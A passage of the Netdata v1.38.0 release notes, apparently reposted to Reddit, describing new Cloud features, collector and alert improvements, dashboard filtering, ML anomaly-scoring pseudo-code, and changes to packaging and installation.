first of many powerful features via the Netdata Cloud UI.</p> <p>Netdata Functions on Netdata Cloud allow you to trigger specific routines to be executed by a given Agent on request. These routines can range from a simple reader that fetches real time information to help you troubleshoot (like the list of currently running processing, currently running db queries, currently open connections, etc.), to routines that trigger an action on your behalf (restart a service, rotate logs, etc.), directly on the node. The key point is to remove the need to open an ssh connection to your node to execute a command like top<br> while you are troubleshooting.</p> <p>The routines are triggered directly from the Netdata Cloud UI, with the request going through the secure, already established by the agent <a href="https://learn.netdata.cloud/docs/agent/aclk">Agent-Cloud Link (ACLK)</a>. Moreover, unlike many of the commands you'd issue from the shell, Netdata Functions come with powerful capabilities like auto-refresh, sorting, filtering, search and more! And, as everything about Netdata, they are fast!</p> <h4>What functions are currently available?</h4> <p>At the moment, just one, to display detailed information on the currently running processes on the node, replacing top and iotop</p> <p>​</p> <p><a href="https://preview.redd.it/ovjkobxk7mga1.png?width=3840&amp;format=png&amp;auto=webp&amp;s=88471c09c0cbaae3c05d6fad2740a35d85f4d217">Real time top/iotop info</a></p> <h3>Events feed</h3> <p><em>Coming by Feb 15th</em></p> <p>The <strong>Events feed</strong> is a powerful new feature that tracks events that happen on your infrastructure, or in your Space. The feed lets you investigate events that occurred in the past, which is obviously invaluable for troubleshooting. Common use cases are ones like when a node goes offline, and you want to understand what events happened before that. A detailed event history can also assist in attributing sudden pattern changes in a time series to specific changes in your environment.</p> <p>We start from humble beginnings, capturing <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#topology-events">topology events</a> (node state transitions) and <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#alert-events">alert state transitions</a>. We intend to expand the events we capture to include infrastructure changes like deployments or services starting/stopping and we plan to provide a way to display the events in the standard Netdata charts.</p> <h3>Additional alert notification methods on Netdata Cloud</h3> <p><em>Coming by Feb 15th</em></p> <p>Every Netdata Agent comes with hundreds of pre-installed health alerts designed to notify you when an anomaly or performance issue affects your node or the applications it runs. All these events, from all your nodes, are centralized at Netdata Cloud.</p> <p>Before this release, Netdata Cloud was only dispatching centralized email alert notifications to your team whenever an alert enters a warning, critical, or unreachable state. However, the agent supported tens of notification delivery methods, which we hadn't provided via the cloud.</p> <p>We are now adding to Netdata Cloud more alert notification integration methods. We categorize them similarly to our <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-paidplans">subscription plans</a>, as Community, Pro and Business. On this release, we added <strong>Discord</strong> (Community Plan), <strong>web hook</strong> (Pro Plan), <strong>PagerDuty</strong> and <strong>Slack</strong> (Business Plan).</p> <h3>Improved role-based access model</h3> <p><em>Coming by Feb 15th</em></p> <p>Netdata Cloud already provides a role-based-access mechanism, that allows you to control what functionalities in the app users can access.<br> Each user can be assigned only one role, which fully specifies all the capabilities they are afforded.</p> <p>With the advent of the <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-paidplans">paid plans</a> we revamped the roles to cover needs expressed by our users, like providing more limited access to your customers, or being able to join any room. We also aligned the offered roles to the target audience of each plan. </p> <h2>Integrations</h2> <h3>Collectors</h3> <h4>Proc</h4> <p>The <a href="https://learn.netdata.cloud/docs/collect/system-metrics">proc plugin</a> gathers metrics from the /proc and /sys folders in Linux<br> systems, along with a few other endpoints, and is responsible for the bulk of the system metrics collected and visualized by Netdata. It collects CPU, memory, disks, load, networking, mount points, and more.</p> <p>We added a "cpu" label to the per core utilization % charts. Previously, the only way to filter or group by core was to use the "instance", i.e. the chart name. The new label makes the displayed dimensions much more user-friendly.</p> <p>We <a href="https://github.com/netdata/netdata/pull/14255">fixed</a> the issues we had with collection of CPU/memory metrics when running inside an LXC container as a systemd service.</p> <p>We also <a href="https://github.com/netdata/netdata/pull/14252">fixed</a> the missing network stack metrics, when IPv6 is disabled.</p> <p>Finally, we improved how the loadavg alerts behave when the number of processors <a href="https://github.com/netdata/netdata/pull/14286">is 0</a>, or <a href="https://github.com/netdata/netdata/pull/14265">unknown</a>.</p> <h4>Apps</h4> <p>The <a href="https://learn.netdata.cloud/docs/collect/application-metrics">apps plugin</a> breaks down system resource usage<br> to processes, users and user groups, by reading whole process tree, collecting resource usage information for every process found running.</p> <p>We <a href="https://github.com/netdata/netdata/pull/14156">fixed</a> the nodejs application group node, which incorrectly included node_exporter. The rule now is that the process must be called node to be included in that group.</p> <p>We also <a href="https://github.com/netdata/netdata/pull/14188">added a telegraf application group</a>.</p> <h4>Containers and VMs (CGROUPS)</h4> <p>The <a href="https://learn.netdata.cloud/docs/agent/collectors/cgroups.plugin">cgroups plugin</a> reads information on Linux Control Groups to monitor containers, virtual machines and systemd services.</p> <p>The "net" section in a cgroups container would occasionally pick the wrong / random interface name to display in the navigation menu. We <a href="https://github.com/netdata/netdata/pull/14174">removed the interface name</a> from the cgroup "net" family. The information is available in the cloud as labels and on the agent as chart names and ids.</p> <h4>eBPF</h4> <p>The <a href="https://learn.netdata.cloud/docs/agent/collectors/ebpf.plugin">eBPF plugin</a> helps you troubleshoot and debug how applications interact with the Linux kernel.</p> <p>We <a href="https://github.com/netdata/netdata/pull/14270">improved</a> the speed and resource impact of the collector shutdown, by reducing the number of threads running in parallel.</p> <p>We fixed a bug with eBPF routines that would sometimes cause kernel panic and system reboot on RedHat 8.* family OSs. <a href="https://github.com/netdata/netdata/pull/14090">#14090</a>, <a href="https://github.com/netdata/netdata/pull/14131">#14131</a></p> <p>We <a href="https://github.com/netdata/netdata/pull/14131">fixed</a> an ebpf.d crash: sysmalloc Assertion failed, then killed with SIGTERM.</p> <p>We <a href="https://github.com/netdata/netdata/pull/14131">fixed</a> a crash when building eBPF while using a memory address sanitizer.</p> <p>The eBPF collector also creates charts for each running application through an integration with the apps.plugin. This integration helps you understand how specific applications interact with the Linux kernel. In systems with many VMs (like Proxmox), this integration<br> can cause a large load. We used to have the integration turned on by default, with the ability to disable it from ebpf.d.conf. We have now done the opposite, having the integration disabled by default, with the ability to enable it. <a href="https://github.com/netdata/netdata/pull/14147">#14147</a></p> <h4>Windows Monitoring</h4> <p>We have been making tremendous improvements on how we <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/wmi">monitor Windows Hosts</a>. The work will be completed in the next release. For now, we can say that we have done some preparatory work by <a href="https://github.com/netdata/netdata/pull/14001">adding more info to existing charts</a>, adding metrics for <a href="https://github.com/netdata/go.d.plugin/pull/1041">MS SQL Server</a>, <a href="https://github.com/netdata/go.d.plugin/pull/972">IIS</a> in 1.37, <a href="https://github.com/netdata/go.d.plugin/pull/1003">Active Directory</a>, <a href="https://github.com/netdata/go.d.plugin/pull/1013">ADFS</a> and <a href="https://github.com/netdata/go.d.plugin/pull/1007">ADCS</a>.</p> <p>We also <a href="https://github.com/netdata/go.d.plugin/pull/1065">reorganized the navigation menu</a>, so that Windows application metrics don't appear under the generic "WMI" category, but on their own category, just like Linux applications.</p> <p>We invite you to try out with these collectors either from a remote Linux machine, or using our new <a href="https://github.com/netdata/msi-installer">MSI installer</a>, which however is not suitable for production. Your feedback will be really appreciated, as we invest on making Windows Monitoring a first class citizen of Netdata.</p> <h4>Generic Prometheus Endpoint Monitoring</h4> <p>Our <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/prometheus">Generic Prometheus Collector</a> gathers metrics from any <a href="https://prometheus.io/">Prometheus</a> endpoint that uses<br> the <a href="https://prometheus.io/docs/instrumenting/exposition_formats/">OpenMetrics exposition format</a>.</p> <p>To allow better grouping and filtering of the collected metrics we now <a href="https://github.com/netdata/go.d.plugin/pull/1004">create a chart with labels per label set</a>.</p> <p>We also <a href="https://github.com/netdata/go.d.plugin/pull/1027">fixed the handling of Summary/Histogram NaN values</a>.</p> <h4>TCP endpoint monitoring</h4> <p>The <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/portcheck">TCP endpoint (portcheck) collector</a> monitors TCP service availability and response time.</p> <p>We <a href="https://github.com/netdata/netdata/pull/14137">enriched</a> the portcheck alarms with labels that show the problematic host and port.</p> <h4>HTTP endpoint monitoring</h4> <p>The <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/httpcheck">HTTP endpoint monitoring collector (httpcheck)</a> monitors their availability and response time.</p> <p>We <a href="https://github.com/netdata/netdata/pull/14133">enriched the alerts</a> with labels that show the slow or unavailable URL relevant to the alert.</p> <h4>Host reachability (ping)</h4> <p>The new <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/ping">host reachability collector</a> replaced fping in v1.37.0.<br> We <a href="https://github.com/netdata/netdata/pull/14073">removed</a> the deprecated fping.plugin, in accordance with the v1.37.0 deprecation notice.</p> <h4>RabbitMQ</h4> <p>The <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/rabbitmq">RabbitMQ collector</a> monitors the open source message broker, by querying its overview, node<br> and vhosts HTTP endpoints.</p> <p>We <a href="https://github.com/netdata/go.d.plugin/pull/1047">added monitoring of the RabitMQ queues</a> that was available in the older Python module and<br><a href="https://github.com/netdata/go.d.plugin/pull/1052">fixed an issue</a> with the new metrics.</p> <h4>MongoDB</h4> <p>We monitor the <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/mongodb">MongoDB</a> NoSQL database <a href="https://www.mongodb.com/docs/manual/reference/command/serverStatus/#mongodb-dbcommand-dbcmd.serverStatus">serverStatus</a> and <a href="https://github.com/netdata/netdata/blob/v1.38.0/mongodb.com/docs/manual/reference/command/dbStats/#dbstats">dbStats</a>.</p> <p>To allow better grouping and filtering of the collected metrics we now <a href="https://github.com/netdata/go.d.plugin/pull/1042">create a chart per database, repl set member, shard and additional metrics</a>. We also <a href="https://github.com/netdata/go.d.plugin/pull/1046">improved</a> the cursors_by_lifespan_count<br> chart dimension names, to make them clearer.</p> <h4>PostgreSQL</h4> <p>Our powerful <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/postgressql">PostgreSQL database collector</a> has been enhanced with an improved <a href="https://github.com/netdata/go.d.plugin/pull/1039">WAL replication lag calculation</a> and <a href="https://github.com/netdata/go.d.plugin/pull/1018">better support of versions before 10</a>.</p> <h4>Redis</h4> <p>The <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/redis">Redis collector</a> monitors the in-memory data structure store via its <a href="https://redis.io/commands/info/">INFO ALL</a> command.</p> <p>We now support password protected Redis instances, by <a href="https://github.com/netdata/go.d.plugin/pull/1051">allowing users to set the username/password</a> in the collector configuration.</p> <h4>Consul</h4> <p>The <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/consul">Consul collector</a> is production ready! <a href="https://www.consul.io/">Consul by HashiCorp</a> is a powerful and complex identity-based networking solution, which is not trivial to monitor. We were lucky to have the assistance of HashiCorp itself in this endeavor, which resulted in a monitoring solution of exceptional quality. Look for common blog posts and announcements in the coming weeks!</p> <h4>NGINX Plus</h4> <p>The <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/nginxplus">NGINX Plus collector</a> monitors the load balancer, API gateway, and reverse proxy built on top of NGINX, by utilizing its <a href="https://docs.nginx.com/nginx/admin-guide/monitoring/live-activity-monitoring/">Live Activity Monitoring</a> capabilities.</p> <p>We improved the collector that was launched last November with <a href="https://github.com/netdata/netdata/pull/14080">additional information</a> explaining the charts and the <a href="https://github.com/netdata/go.d.plugin/pull/1010">addition of SSL error metrics</a>.</p> <h4>Elastic Search</h4> <p>The <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/elasticsearch">Elastic Search collector</a> monitors the search engine's instances<br> via several of the provided local interfaces.</p> <p>To allow better grouping and filtering of the collected metrics we now <a href="https://github.com/netdata/go.d.plugin/pull/1040">create a chart per node index, a dimension per health status</a>. We also <a href="https://github.com/netdata/netdata/pull/14197">added several OOB alerts</a>.</p> <h4>NVIDIA GPU</h4> <p>Our <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/nvidia_smi">NVIDIA GPU Collector</a> monitors memory usage, fan speed, PCIE bandwidth utilization, temperature, and other GPU performance metrics using the nvidia-smi cli tool.</p> <p>Multi-Instance GPU (MIG) is a feature from NVIDIA that lets users partition a single GPU to smaller GPU instances. We <a href="https://github.com/netdata/go.d.plugin/pull/1067">added MIG metrics</a> for uncorrectable errors and memory usage.</p> <p>We also <a href="https://github.com/netdata/go.d.plugin/pull/1048">added metrics for voltage</a> and <a href="https://github.com/netdata/netdata/pull/14315">PCIe bandwidth utilization percentage</a>.</p> <p>Last but not least, we significantly improved the collector's performance, by switching to <a href="https://github.com/netdata/go.d.plugin/pull/1023">collecting data using the CSV format</a>.</p> <h4>Pi-hole</h4> <p>We monitor <a href="https://learn.netdata.cloud/docs/agent/collectors/go.d.plugin/modules/pihole">Pi-hole</a>, the Linux network-level advertisement and Internet tracker blocking application via its <a href="https://github.com/pi-hole/AdminLTE">PHP API</a>.</p> <p>We <a href="https://github.com/netdata/go.d.plugin/pull/1037">fixed</a> an issue with the requests failing against an authenticated API.</p> <h4>Network Time Protocol (NTP) daemon</h4> <p>The ntpd program is an operating system daemon which sets and maintains the system time of day in synchronism with Internet standard time-servers (<a href="https://linux.die.net/man/8/ntpd">man page</a>).</p> <p>We rewrote our previous python.d collector in go, improving its performance and maintainability.<br> The new collector still monitors the system variables of a local ntpd daemon and optionally the variables of its polled peers. Similarly to ntpq, the <a href="http://doc.ntp.org/current-stable/ntpq.html">standard NTP query program</a>, we used the NTP Control Message Protocol over a UDP socket.</p> <p>The python collector <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-deprecation">will be deprecated in the next release</a>, with no effect on current users.</p> <h3>Notifications</h3> <p>See <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-notifications">Additional alert notification methods on Netdata Cloud</a></p> <p>The agents can now <a href="https://github.com/netdata/netdata/pull/14153">send notifications to Mattermost</a>, using the Slack integration! <a href="https://mattermost.com/">Mattermost</a> has a <a href="https://jeffschering.github.io/mmdocs/monolith/developer/api.html#incoming-webhooks">Slack-compatible API</a> that only required a couple of additional parameters. Kudos to <a href="https://github.com/je2555">@je2555</a>!</p> <h3>Exporters</h3> <p>Netdata can <a href="https://learn.netdata.cloud/guides/export/export-netdata-metrics-graphite">export and visualize Netdata metrics in Graphite</a>.</p> <p>Our exporter was broken in v1.37.0 due to our host labels for ephemeral nodes. we fixed the issue with <a href="https://github.com/netdata/netdata/pull/14105">#14105</a>.</p> <h2>Alerts and Notification Engine</h2> <h3>Health Engine</h3> <p>To improve performance and stability, we made <a href="https://github.com/netdata/netdata/pull/14244">health run in a single thread</a>.</p> <h3>Notifications Engine</h3> <p>The agent alert notifications are controlled by the configuration file <a href="https://github.com/netdata/netdata/blob/master/health/notifications/health_alarm_notify.conf">health_alarm_notify.conf</a>. Previously, if one used the |critical modifier, the recipients would always get at least 2 notifications: critical and clear. There was no way how to stop sending clear/warning notifications afterwards. We <a href="https://github.com/netdata/netdata/pull/14330">added</a> the |nowarn and |noclear notification modifiers, to allow users to really receive just the transitions to the critical state.</p> <p>We also <a href="https://github.com/netdata/netdata-cloud/issues/656">fixed the broken redirects from alert notifications to cleared alerts</a>.</p> <h3>Alerts</h3> <h4>Chart labels in alerts</h4> <p>We constantly strive to improve the clarity of the information provided by the hundreds of out of the box alerts we provide. We can now provide more fine-tuned information on each alert, as we <a href="https://github.com/netdata/netdata/pull/14173">started using specific chart labels instead of family</a>. To provide the capability we also had to <a href="https://github.com/netdata/netdata/pull/14206">change the format of alert info variables</a> to support the more complex syntax.</p> <h4>Globally enable/disable specific alerts</h4> <p>Administrators can now globally, permanently disable specific OOB alerts via netdata.conf<br> . Previously the options where to <a href="https://learn.netdata.cloud/docs/monitor/configure-alarms">edit individual alert configuration files</a>, or to use the <a href="https://learn.netdata.cloud/docs/agent/web/api/health#health-management-api">health management API</a>.</p> <p>The [health] section of netdata.conf now support the setting enabled_alarms. It's value defines which alarms to load from both user and stock directories. The value is a <a href="https://github.com/netdata/netdata/blob/v1.38.0/libnetdata/simple_pattern/README.md">simple pattern</a> list of alarm or template names, with the default value of *, meaning that all alerts are loaded. For example, to disable specific alarms, you can provide enabled alarms = !oom_kill *, which will load all alarms except oom_kill.</p> <h2>Visualizations / Charts and Dashboards</h2> <p>Our main focus for visualization is on the Netdata Cloud <strong>Overview</strong> dashboard. This dashboard is our flagship, on which everything we do, all slicing and dicing capabilities of Netdata, are added and integrated. We are working hard to make this dashboard powerful enough, so that the need to learn a query language for configuring and customizing monitoring dashboards, will be eliminated.</p> <p>On this release, we virtualized all items on the dashboard, allowing us to achieve exceptional performance on page rendering. In previous releases there were issues on dashboards with thousands of charts. Now the number of items in the page is irrelevant!</p> <p>To make slicing and dicing of data easier, we ordered the on-chart selectors in a way that is more natural for most users:</p> <p>​</p> <p><a href="https://preview.redd.it/bnwtlvqc7mga1.png?width=2774&amp;format=png&amp;auto=webp&amp;s=ad41b2f9ca2fa5190748387ffe48adcdcb3dd66c">https://preview.redd.it/bnwtlvqc7mga1.png?width=2774&amp;format=png&amp;auto=webp&amp;s=ad41b2f9ca2fa5190748387ffe48adcdcb3dd66c</a></p> <p>This bar above the chart now describes the data presented, in plain English: <strong>On 6 out of 20 Nodes, group by dimension, the SUM() of 23 Instances, using All dimensions, each as AVG() every 3s</strong></p> <p>A tool-tip provides more information about the missing nodes.</p> <p><a href="https://preview.redd.it/mfdngdzt7mga1.png?width=2790&amp;format=png&amp;auto=webp&amp;s=2886138f488e76278ecbe87f14805095d8a8a88e">https://preview.redd.it/mfdngdzt7mga1.png?width=2790&amp;format=png&amp;auto=webp&amp;s=2886138f488e76278ecbe87f14805095d8a8a88e</a></p> <p>And the drop-down menu now shows the exact nodes that contributed data to the query, together with a short explanation on why nodes did not provide any data: </p> <p><a href="https://preview.redd.it/az6j4f8v7mga1.png?width=2790&amp;format=png&amp;auto=webp&amp;s=ae343ae012f8eda5ee325d96e9b5946a309137e5">https://preview.redd.it/az6j4f8v7mga1.png?width=2790&amp;format=png&amp;auto=webp&amp;s=ae343ae012f8eda5ee325d96e9b5946a309137e5</a></p> <p>Additionally, the pop-out icon next to each node can be used to jump to the single node dashboard of this node.</p> <p>All the slicing and dicing controls (Nodes, Dimensions, Instances), now support filtering. As shown above, there is a search box in the drop-down and a tick-mark to the left of each item in the list, which can be used to instantly filter the data presented.</p> <p>At the same time, we re-worked most of the Netdata collectors to add labels to the charts, allowing the chart to be pivoted directly from the <strong>group by</strong> drop-down menu. On the following image, we see the same chart as above, but now the data have been grouped by the label device, the values of which became dimensions of the chart.</p> <p>​</p> <p><a href="https://preview.redd.it/xp6qztwx7mga1.png?width=2772&amp;format=png&amp;auto=webp&amp;s=7b1f5172742a0725dfe31330ae75f6bdcb73ee2f">https://preview.redd.it/xp6qztwx7mga1.png?width=2772&amp;format=png&amp;auto=webp&amp;s=7b1f5172742a0725dfe31330ae75f6bdcb73ee2f</a></p> <p>The data can be instantly be filtered by original dimension (reads and writes in this example), like this: </p> <p><a href="https://preview.redd.it/43v2lck08mga1.png?width=2762&amp;format=png&amp;auto=webp&amp;s=d17a0d9ab8aa82bd441df804c7f5c96cdd663895">https://preview.redd.it/43v2lck08mga1.png?width=2762&amp;format=png&amp;auto=webp&amp;s=d17a0d9ab8aa82bd441df804c7f5c96cdd663895</a></p> <p>or even by a specific instance (disk in this example), like this: </p> <p><a href="https://preview.redd.it/26px2pf28mga1.png?width=2776&amp;format=png&amp;auto=webp&amp;s=fa64868dbf996c1d4b5ea694ebd05d303b2139bb">https://preview.redd.it/26px2pf28mga1.png?width=2776&amp;format=png&amp;auto=webp&amp;s=fa64868dbf996c1d4b5ea694ebd05d303b2139bb</a></p> <p>On the Instances drop down list (shown above), the pop-out icon to the right of each instance can be used to quickly jump to the single node dashboard, and we also made this function automatically scroll the dashboard to relative chart's position and filter on that chart the specific instance from which the jump was made.</p> <p>Our goal is to polish and fine tune this interface, to the degree that it will be possible to slice and dice any data, without learning a query language, directly from the dashboard. We believe that this will simplify monitoring significantly, make it more accessible to people, and it will eventually allow all of us to troubleshoot issues without any prior knowledge of the underlying data structures.</p> <p>At the same time, we worked to improve switching between rooms and tabs within a room, by saving the last visible chart and the selected page filters, we are restored automatically when the user switches back to the same room and tab.</p> <p>For the ordering of the sections and subsections on the dashboard menu, we made a change to allow currently collected charts to overwrite the position of the section and subsection (we call it priority<br> ). Before this change, archived metrics (old metrics that are retained due to retention), were participating in the election of the priority<br> for a section or subsection and because the retention Netdata maintains by default is more than a year, changes to the priority<br> were never propagated to the UI.</p> <h4>Bug fixes</h4> <p>We fixed:</p> <ul><li><a href="https://github.com/netdata/netdata-cloud/issues/662">The alignment of the anomaly rate pop-down chart</a></li> <li><a href="https://github.com/netdata/netdata-cloud/issues/704">The width of the right-hand menu bar</a></li> <li><a href="https://github.com/netdata/netdata-cloud/issues/695">A crash when filtering dimensions</a></li> <li><a href="https://github.com/netdata/netdata-cloud/issues/649">The warning when a user tries to leave the last space</a></li> <li><a href="https://github.com/netdata/netdata-cloud/issues/653">The filters of the Metric Correlation screen incorrectly persisting</a></li> <li><a href="https://github.com/netdata/netdata-cloud/issues/692">The wrong value being shown for whether a node has ML enabled</a></li> <li><a href="https://github.com/netdata/netdata-cloud/issues/688">The node filter on the anomalies tab</a></li> <li><a href="https://github.com/netdata/netdata-cloud/issues/648">The visibility of the chart actions menu that appears inside a chart</a></li> <li><a href="https://github.com/netdata/netdata-cloud/issues/667">Logstash metrics not being displayed in Netdata Cloud</a></li> <li><a href="https://github.com/netdata/netdata-cloud/issues/679">The home tab not being updated with the correct number of nodes, after deleting a node</a></li> </ul><h3>Real Time Functions</h3> <p>See <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-functions">Functions</a></p> <h3>Events Feed</h3> <p>See <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-feed">Events Feed</a>.</p> <h2>Database</h2> <h3>New database engine</h3> <p>See <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-dbenginev2">Dramatic performance and stability improvements, with a smaller agent footprint</a></p> <h3>Metadata sync</h3> <p>Saving metadata to SQLite is now faster. Metadata saving starts asynchronously when the agent starts and continues as long as there are metadata to be saved. We implemented optimizations by grouping queries into transactions. At runtime this grouping happens per chart, which on shutdown it happens per host. These changes made metadata syncing up to 4x faster.</p> <h2>Streaming and Replication</h2> <p>We introduced very significant reliability and performance improvements to the streaming protocol and the database replication. See <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-stream">Streaming</a>, <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-repl">Replication</a>.</p> <p>At the same time, we fixed SSL handshake issues on established SSL connections, provide stable streaming SSL connectivity between Netdata agents.</p> <h2>API</h2> <p>Data queries for charts and contexts now have the following additional features:</p> <ol><li>The query planner that decided which tier to use for each query, now prefers higher tiers, to speed up queries</li> <li>Joining of multiple tiers to the same query now prefers higher resolution tiers and joining is accurate. To achieve that, behind the scenes the query planner expands the query of each tier to overlap with its previous and next and at the time they intersect, it reads points from all the overlapping tiers to decide how exactly the join should happen.</li> <li>Data queries now utilize the parallelism of the new dbengine, to pipeline query preparation of the dimensions of the chart or context being queried, and then preloading metric data for dimensions that are in the pipeline.</li> </ol><h2>Machine Learning</h2> <p>We have been busy at work under the hood of the Netdata agent to introduce new capabilities that let you extend the "training window" used by Netdata's <a href="https://learn.netdata.cloud/docs/nightly/setup/configure-machine-learning-ml-powered-anomaly-detection">native anomaly detection capabilities</a>.</p> <p><a href="https://preview.redd.it/ij8xh9rw8mga1.png?width=955&amp;format=png&amp;auto=webp&amp;s=df442f7f5722a6959c66b9498920884b8568e2cd">https://preview.redd.it/ij8xh9rw8mga1.png?width=955&amp;format=png&amp;auto=webp&amp;s=df442f7f5722a6959c66b9498920884b8568e2cd</a></p> <p>We have <a href="https://learn.netdata.cloud/docs/nightly/setup/configure-machine-learning-ml-powered-anomaly-detection#descriptions-minmax">introduced a new ML parameter</a> called number of models per dimension<br> which will control the number of most recently trained models used during scoring.</p> <p>Below is some pseudo-code of how the trained models are actually used in producing <a href="https://learn.netdata.cloud/docs/nightly/setup/configure-machine-learning-ml-powered-anomaly-detection#anomaly-bit">anomaly bits</a> (which give you an "<a href="https://learn.netdata.cloud/docs/nightly/setup/configure-machine-learning-ml-powered-anomaly-detection#anomaly-rate">anomaly rate</a>" over any window of time) each second.</p> <p><code># preprocess recent observations into a "feature vector"</code></p> <p><code>latest_feature_vector = preprocess_data([recent_data])</code></p> <p><code># loop over each trained model</code></p> <p><code>for model in models:</code></p> <p><code># if recent feature vector is considered normal by any model, stop scoring</code></p> <p><code>if model.score(latest_feature_vector) &lt; dimension_anomaly_score_threshold:</code></p> <p><code>anomaly_bit = 0</code></p> <p><code>break</code></p> <p><code>else:</code></p> <p><code># only if all models agree the feature vector is anomalous is it considered anomalous by netdata</code></p> <p><code>anomaly_bit = 1</code></p> <p>​</p> <p>The aim here is to only use those additional stored models when we need to. So essentially once one model suggests a feature vector looks anomalous we check all saved models and only when they all agree that something is anomalous does the anomaly bit get to be finally set to 1 to signal that Netdata considered the most recent feature vector unlike anything seen in all the models (spanning a wider training window) checked.</p> <p>Read more in <a href="https://blog.netdata.cloud/extending-anomaly-detection-training-window/">this blog post</a>!</p> <p>We now <a href="https://github.com/netdata/netdata/pull/14207">create ML charts on child hosts</a>, when a parent runs a ML for a child. These charts use the parent's hostname to differentiate multiple parents that might run ML for a child.</p> <p>Finally, we <a href="https://github.com/netdata/netdata/pull/14198">refactored the ML code and added support for multiple KMeans models</a>.</p> <h2>Installation and Packaging</h2> <h3>New hosting of build artifacts</h3> <p>We are always looking to improve the ways we make the agent available to users. Where we host our build artifacts is an important piece of the puzzle, and we've taken some significant steps in the past couple of months.</p> <h4>New hosting of nightly build artifacts</h4> <p>As of 2023-01-16, our nightly build artifacts are being hosted as GitHub releases on the new <a href="https://github.com/netdata/netdata-nightlies/">https://github.com/netdata/netdata-nightlies/</a> repository instead of being hosted on Google Cloud Storage. In most cases, this should have no functional impact for users, and no changes should be required on user systems.</p> <h4>New hosting of native package repositories</h4> <p>As part of improving support for our native packages, we are migrating off of Package Cloud to our own self-hosted package repositories located at <a href="https://repo.netdata.cloud/repos/">https://repo.netdata.cloud/repos/</a>. This new infrastructure provides a number of benefits, including signed packages, easier on-site caching, more rapid support for newly released distributions, and the ability to support native packages for a wider variety of distributions.</p> <p>Our RPM repositories <a href="https://github.com/netdata/netdata/discussions/14161">have already been fully migrated</a> and the DEB repositories <a href="https://github.com/netdata/netdata/discussions/14300">are currently in the process of being migrated</a>.</p> <h4>Official Docker images now available on GHCR and Quay</h4> <p>In addition to Docker Hub, our official Docker images are now available on <a href="https://github.com/netdata/netdata/pkgs/container/netdata">GHCR</a> and <a href="https://quay.io/repository/netdata/netdata">Quay</a>. The images are identical across all three registries, including using the same tagging.</p> <p>You can use our Docker images from GHCR or Quay by either configuring them as registries with your local container tooling, or by using <a href="https://ghcr.io/netdata/netdata">ghcr.io/netdata/netdata</a> or <a href="https://quay.io/netdata/netdata">quay.io/netdata/netdata</a> instead of netdata/netdata.</p> <h3>kickstart</h3> <p>The directives --local-build-options and --static-install-options used to only accept a single option each. We now <a href="https://github.com/netdata/netdata/pull/14287">allow multiple options to be entered</a>.</p> <p>We <a href="https://github.com/netdata/netdata/pull/13881">renamed</a> the --install option to --install-prefix, to clarify that it affects the directory under which the Netdata agent will be installed.</p> <p>To help prevent user errors, passing an unrecognized option to the kickstart script <a href="https://github.com/netdata/netdata/pull/12943">now results in a fatal error</a> instead of just a warning.</p> <p>We previously used grep to get some info on login or group, which could not handle cases with centralized authentication like Active Directory or FreeIPA or pure LDAP. We <a href="https://github.com/netdata/netdata/pull/14316">now use "getent group"</a> to get the group information.</p> <h3>RPMs</h3> <p>We <a href="https://github.com/netdata/netdata/pull/14140">fixed the required permissions</a> of the cgroup-network and ebpf.plugin in RPM packages.</p> <h3>OpenSUSE</h3> <p>We <a href="https://github.com/netdata/netdata/pull/14260">fixed the binary package updates</a> that were failing with an error on "Zypper upgrade".</p> <h3>FreeBSD</h3> <p>We <a href="https://github.com/netdata/netdata/pull/14095">fixed the missing required package installation of "tar"</a>.</p> <h3>MacOS</h3> <p>We <a href="https://github.com/netdata/netdata/pull/14304">fixed some crashes on MacOS</a>.</p> <h3>Proxmox</h3> <p>Netdata on Proxmox virtualization management servers must be allowed to resolve VM/container names and read their CPU and memory limits. </p> <p>We now <a href="https://github.com/netdata/netdata/pull/14168">explicitly add</a> the netdata user to the www-data group on Proxmox, so that users don't have to do it manually.</p> <h3>Other</h3> <p>We <a href="https://github.com/netdata/netdata/pull/14180">fixed the path to "netdata.pid"</a> in the logrotate postrotate script, which causes some errors during log rotation.</p> <p>We also <a href="https://github.com/netdata/netdata/pull/14239">added pre gcc v5 support</a> and allowed building without dbengine.</p> <h2>Administration</h2> <h3>Logging</h3> <p>We have improved the readability of our main error log file error.log<br> , by <a href="https://github.com/netdata/netdata/pull/14309">moving data collection specific log messages</a> to collector.log<br> . For the same reason we <a href="https://github.com/netdata/netdata/pull/14117">reduced the log verbosity of streaming connections</a>.</p> <h3>New configuration editing script</h3> <p>We reimplemented the edit-config script we install in the user config directory, adding a few new features, and fixing a number of outstanding issues with the previous script.</p> <h3>Netdata Monitoring</h3> <p>The new Netdata Monitoring section on our dashboard has dozens of charts detailing the operation of Netdata. All new components have their charts, dbengine, metrics registry, the new caches, the dbengine query router, etc.</p> <p>At the same time, we added a chart detailing the memory used by the agent and the function it is used for. This was the hardest to gather, since information was spread all over the place, but thankfully the internals of the agents have changed drastically in the last few months, allowing us to have a better visibility on memory consumption. At its heart, the agent is now mainly an array allocator (ARAL) and a dictionary (indexed and ordered lists of objects), carefully crafted to achieve their maximum 